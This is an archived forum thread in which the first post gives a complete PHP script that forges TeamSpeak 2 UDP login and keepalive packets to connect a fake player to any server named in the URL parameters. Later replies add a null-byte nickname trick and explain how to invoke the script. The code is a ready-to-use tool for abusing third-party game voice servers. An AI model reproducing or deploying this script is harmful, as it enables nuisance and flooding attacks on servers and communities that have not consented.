Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 13:24

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 5 posts ] 
Author Message
 Post subject: Teamspeak Fake Player via. PHP
PostPosted: 03 Sep 2008 20:20 

Joined: 24 Aug 2008 12:54
Posts: 1
Code:
<?php
/*
TeamSpeak Fake Player PHP
By: Fabian( DarK PhoEniX )

Credits:
Luigi - Explained me that stupid uninitialised buffers
Some other for hex2str and DecToHex32
*/
  function MyCRC32( $data )
  {
     $csum = dechex(crc32( $data ));
     
     $csum_string =   chr( hexdec(substr( $csum, 6, 2 )) );
     $csum_string .=  chr( hexdec(substr( $csum, 4, 2 )) );
     $csum_string .=  chr( hexdec(substr( $csum, 2, 2 )) );
     $csum_string .=  chr( hexdec(substr( $csum, 0, 2 )) );
     
     return $csum_string;     
  }
  function hex2str($hex)
  {
    for($i=0;$i<strlen($hex);$i+=2)
    {
      $str.=chr(hexdec(substr($hex,$i,2)));
    }
    return $str;
  }
  function BuildTeamSpeakString($string, $len)
  {
    if( strlen( $string ) > $len || strlen( $string ) > 255 )
        die( "String is too long..." );
   
    $ts_string = hex2str( strVal( dechex(strlen($string)) ) );
    $ts_string .= $string;

    for( $i = 0; $i < ($len - strlen($string)); $i = $i + 1 )
        $ts_string .= hex2str("00");
   
    return $ts_string;
  }
  function DecToHex32($number)
  {
      $i = 0;
      $hex = array();
 
      while($i < 8) {
          if($number == 0) {
              array_push($hex, '0');
          }
          else {
              array_push($hex, strtoupper(dechex(bcmod($number, '16'))));
              $number = bcdiv($number, '16', 0);
          }
          $i++;
      }
      krsort($hex);
      $imp_string = implode($hex);
     
      $ret_string =   substr( $imp_string, 6, 2 );
      $ret_string .=  substr( $imp_string, 4, 2 );
      $ret_string .=  substr( $imp_string, 2, 2 );
      $ret_string .=  substr( $imp_string, 0, 2 );
      return $ret_string;
  }
 
  if( !$_GET['ServerIP'] || !$_GET['ServerPort'] )
  {
    die( "No Target!" );
  }
 
  $TeamSpeakIP = $_GET['ServerIP'];
  $TeamSpeakPort = intVal($_GET['ServerPort']);
 
  $SessionID = hex2str("00000000");
  $PlayerID = hex2str("00000000");
  $FileName = '';
 
  $packet1 = hex2str("f4be");
  $packet1 .= hex2str("0300");
  $packet1 .= hex2str("00000000");
  $packet1 .= hex2str("00000000");
  $packet1 .= hex2str("01000000");
  $packet1 .= hex2str("00000000"); // CRC32
  $packet1 .= BuildTeamSpeakString("TeamSpeak",29);
  $packet1 .= BuildTeamSpeakString("PHP v.1337 By: Fabian",29);
  $packet1 .= hex2str("0200000020003C00");
  $packet1 .= hex2str("01");
  $packet1 .= hex2str("01");
  $packet1 .= BuildTeamSpeakString("",29);
  $packet1 .= BuildTeamSpeakString("",29);
  $packet1 .= BuildTeamSpeakString("TSPHP v1.0",29);
 
  $checksum = MyCRC32( $packet1 );
  for( $count = 0; $count < 4; $count = $count + 1 )
  {
      $packet1[16+$count] = $checksum[$count];
  }
       
  $udpsocket = fsockopen("udp://" . $TeamSpeakIP, $TeamSpeakPort);
  fwrite($udpsocket, $packet1);
  stream_set_timeout($udpsocket, 1);
  $response = ''.fread($udpsocket, 10000);
  $info = stream_get_meta_data($udpsocket);
 
   if ($info['timed_out']) {
       die("Timed Out!");
   }else{
   
       if( substr($response, 88, 4) == "\x01\x00\x00\x00" )
       {
           for( $count = 0; $count < 4; $count = $count + 1 )
           {
             $SessionID[$count] = $response[172+$count];
           }
           echo( "\n" );
           
           for( $count = 0; $count < 4; $count = $count + 1 )
           {
             $PlayerID[$count] = $response[8+$count];
           }
           
           $FileName .= chr(rand(97,122));
           $FileName .= chr(rand(97,122));
           $FileName .= chr(rand(97,122));
           $FileName .= "TS.txt";
           $handler = fOpen($FileName , "a+");
           fWrite($handler , "Alive");
           fClose($handler);
                     
           $packet2 = hex2str("F0BE");
           $packet2 .= hex2str("0500");
           $packet2 .= hex2str("00000000");
           $packet2 .= hex2str("00000000");
           $packet2 .= hex2str("01000000");
           $packet2 .= hex2str("00000000");   
           $packet2 .= hex2str("00000000");// CRC32
           $packet2 .= hex2str("0100");
           $packet2 .= BuildTeamSpeakString("Long AFK",29);
           $packet2 .= BuildTeamSpeakString("",29);
           $packet2 .= BuildTeamSpeakString("",29);
           $packet2 .= hex2str("00000000");
               
           for( $count = 0; $count < 4; $count = $count + 1 )
           {
             $packet2[4+$count] = $SessionID[$count];
           }
           
           for( $count = 0; $count < 4; $count = $count + 1 )
           {
             $packet2[8+$count] = $PlayerID[$count];
           }     
           
           $checksum = MyCRC32( $packet2 );
           for( $count = 0; $count < 4; $count = $count + 1 )
           {
               $packet2[20+$count] = $checksum[$count];
           }
           
           fwrite($udpsocket, $packet2);
           $response = ''.fread($udpsocket, 10000);
           $info = stream_get_meta_data($udpsocket);
         
           if ($info['timed_out']) {
              echo("Timed Out!");
           }else{
              echo("Player Connected!");
             
              $seq = 2;
              ignore_user_abort(true);
              set_time_limit(0);
             
              for(;;)
              {
                  $text = file_get_contents($FileName);
                  if( $text == false || !strstr( $text, "Alive" ) )
                      break;
                                       
                  $packet3 = hex2str("F4BE");
                  $packet3 .= hex2str("0100");
                  $packet3 .= hex2str("00000000");
                  $packet3 .= hex2str("00000000");
                  $packet3 .= hex2str(DecToHex32($seq));                                                                                                             
                  $packet3 .= hex2str("00000000");// CRC32
                 
                  for( $count = 0; $count < 4; $count = $count + 1 )
                  {
                    $packet3[4+$count] = $SessionID[$count];
                  }
                   
                  for( $count = 0; $count < 4; $count = $count + 1 )
                  {
                    $packet3[8+$count] = $PlayerID[$count];
                  }       
                 
                  $checksum = MyCRC32( $packet3 );
                  for( $count = 0; $count < 4; $count = $count + 1 )
                  {
                    $packet3[16+$count] = $checksum[$count];
                  }                 
                 
                  $seq = $seq + 1;
                                   
                  fwrite($udpsocket, $packet3);
                 
                  while( !fread($udpsocket, 10000) ){}
              }           
           }
       }else{
           die("Player Not Accepted!");
       }
   
   }
?>


Suggestions for improvements are welcome...


Top
 Profile  
 
 
 Post subject: Re: Teamspeak Fake Player via. PHP
PostPosted: 17 Sep 2008 12:39 

Joined: 09 Apr 2008 08:06
Posts: 66
Location: USA
not bad also i cant remember tho but there also is a null you could add cant remember what versions it works for but you would put in browser for example teamspeak://IP:PORT?nickname=name%00 and well yea.


Top
 Profile  
 
 Post subject: Re: Teamspeak Fake Player via. PHP
PostPosted: 17 May 2010 17:29 

Joined: 16 May 2010 16:45
Posts: 5
well, i kinda didnt get the part you have to type into the browser,is it like www.url.de/ts.php/192.168.178.48:8767 (it is just an example) or what? because it is kinda weird, it dosnt really work out for me


Top
 Profile  
 
 Post subject: Re: Teamspeak Fake Player via. PHP
PostPosted: 25 May 2010 11:38 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
www.url.de/ts.php?ServerIP=192.168.178. ... rPort=8767


Top
 Profile  
 
 Post subject: Re: Teamspeak Fake Player via. PHP
PostPosted: 09 Sep 2010 00:44 

Joined: 19 May 2009 21:37
Posts: 36
tested on a ts2 public server without psw protect , all I get is on the page after pressing enter = " Timed Out! "


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 5 posts ] 

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
cron